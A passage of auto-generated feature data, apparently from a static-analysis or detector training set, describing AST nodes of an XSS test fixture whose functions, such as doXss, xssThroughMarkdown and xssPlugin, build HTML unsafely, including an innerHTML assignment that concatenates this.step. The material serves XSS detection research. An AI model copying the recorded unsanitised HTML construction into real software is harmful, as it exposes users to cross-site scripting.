enclosingFunctionName | doXss | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:32:47:39 | "#class" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:32:47:39 | "#class" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:42:47:50 | innerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:42:47:50 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:42:47:50 | innerHTML | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:42:47:50 | innerHTML | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:42:47:50 | innerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:61 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:61 | "" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:61 | "" | enclosingFunctionBody | document querySelector #class innerHTML step | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:61 | "" | enclosingFunctionName | doXss | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:61 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:61 | "" | stringConcatenatedWith | -endpoint- this.step + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:73 | "" + this.step | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:73 | "" + this.step | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:73 | "" + this.step | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:73 | "" + this.step | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:73 | "" + this.step | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:85 | " ... /span>" | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:85 | " ... /span>" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:85 | " ... /span>" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:85 | " ... /span>" | enclosingFunctionBody | document querySelector #class innerHTML step | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:85 | " ... /span>" | enclosingFunctionName | doXss | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:54:47:85 | " ... /span>" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:65:47:68 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:65:47:68 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:65:47:68 | this | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:65:47:68 | this | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:65:47:68 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:65:47:73 | this.step | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:65:47:73 | this.step | contextSurroundingFunctionParameters | () | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:65:47:73 | this.step | enclosingFunctionBody | document querySelector #class innerHTML step | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:65:47:73 | this.step | enclosingFunctionName | doXss | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:65:47:73 | this.step | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:65:47:73 | this.step | stringConcatenatedWith | '' -endpoint- '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:70:47:73 | step | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:70:47:73 | step | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:70:47:73 | step | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:70:47:73 | step | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:70:47:73 | step | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:77:47:85 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:77:47:85 | "" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:77:47:85 | "" | enclosingFunctionBody | document querySelector #class innerHTML step | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:77:47:85 | "" | enclosingFunctionName | doXss | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:77:47:85 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:77:47:85 | "" | stringConcatenatedWith | '' + this.step -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:1:52:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:1:52:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:1:52:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:1:52:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:1:52:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:1:52:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:1:52:27 | module. ... esClass | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:1:52:27 | module. ... esClass | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:1:52:27 | module. ... esClass | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:1:54:1 | module. ... o(s);\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:1:54:1 | module. ... o(s);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:1:54:1 | module. ... o(s);\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:8:52:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:8:52:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:8:52:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:16:52:27 | createsClass | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:16:52:27 | createsClass | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:16:52:27 | createsClass | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:52:30 | Foo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:52:30 | Foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:52:30 | Foo | enclosingFunctionBody | s Foo s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:52:30 | Foo | enclosingFunctionName | createsClass | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:52:30 | Foo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:52:30 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:52:30 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:52:30 | this | enclosingFunctionBody | s Foo s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:52:30 | this | enclosingFunctionName | createsClass | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:52:30 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | 'arguments' object of anonymous function | enclosingFunctionBody | s Foo s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | 'arguments' object of anonymous function | enclosingFunctionName | createsClass | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | exceptional return of anonymous function | enclosingFunctionBody | s Foo s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | exceptional return of anonymous function | enclosingFunctionName | createsClass | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | functio ... o(s);\\n} | assignedToPropName | createsClass | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | functio ... o(s);\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | functio ... o(s);\\n} | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | functio ... o(s);\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | return of anonymous function | enclosingFunctionBody | s Foo s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | return of anonymous function | enclosingFunctionName | createsClass | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:31:54:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:41:52:41 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:41:52:41 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:41:52:41 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:41:52:41 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:41:52:41 | s | enclosingFunctionBody | s Foo s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:41:52:41 | s | enclosingFunctionBody | s Foo s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:41:52:41 | s | enclosingFunctionName | createsClass | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:41:52:41 | s | enclosingFunctionName | createsClass | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:41:52:41 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:52:41:52:41 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:12:53:21 | exceptional return of new Foo(s) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:12:53:21 | exceptional return of new Foo(s) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:12:53:21 | exceptional return of new Foo(s) | enclosingFunctionBody | s Foo s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:12:53:21 | exceptional return of new Foo(s) | enclosingFunctionName | createsClass | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:12:53:21 | exceptional return of new Foo(s) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:12:53:21 | new Foo(s) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:12:53:21 | new Foo(s) | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:12:53:21 | new Foo(s) | enclosingFunctionBody | s Foo s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:12:53:21 | new Foo(s) | enclosingFunctionName | createsClass | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:12:53:21 | new Foo(s) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:16:53:18 | Foo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:16:53:18 | Foo | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:16:53:18 | Foo | enclosingFunctionBody | s Foo s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:16:53:18 | Foo | enclosingFunctionName | createsClass | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:16:53:18 | Foo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:20:53:20 | s | CalleeFlexibleAccessPath | Foo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:20:53:20 | s | InputArgumentIndex | 0 | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:20:53:20 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:20:53:20 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:20:53:20 | s | enclosingFunctionBody | s Foo s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:20:53:20 | s | enclosingFunctionName | createsClass | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:53:20:53:20 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:1:56:1 | $ | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:1:56:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:1:56:1 | $ | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:1:56:4 | $.fn | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:1:56:4 | $.fn | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:1:56:4 | $.fn | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:1:56:14 | $.fn.xssPlugin | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:1:56:14 | $.fn.xssPlugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:1:56:14 | $.fn.xssPlugin | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:56:1:64:1 | $.fn.xs ... 